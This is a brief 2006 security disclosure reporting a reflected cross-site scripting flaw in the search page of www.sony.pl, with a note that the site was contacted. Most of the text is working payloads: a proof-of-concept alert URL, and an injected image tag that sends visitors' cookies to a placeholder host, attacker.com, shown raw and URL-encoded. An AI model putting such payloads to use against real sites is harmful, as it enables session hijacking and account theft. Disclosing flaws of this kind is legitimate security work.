20061029 - XSS bug for www.sony.pl
http://kaneda.bohater.net

XSS IN:
http://www.sony.pl/search/Search.action?site=odw_pl_PL&advanced=true&locale=pl_PL&brand=all&query=%22%3E%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E

Posted data:

"><IMG SRC=javascript:location.href='http://attacker.com/xssscript.php?cook='+escape(document.cookie)>;">

http://www.sony.pl/search/Search.action?site=odw_pl_PL&advanced=true&locale=&query=%22%3E%3CIMG+SRC%3Djavascript%3Alocation.href%3D%27http%3A%2F%2Fattacker.com%2Fxssscript.php%3Fcook%3D%27%2Bescape%28document.cookie%29%3E%3B%22%3E

2006.11.09	www.sony.pl contacted by mail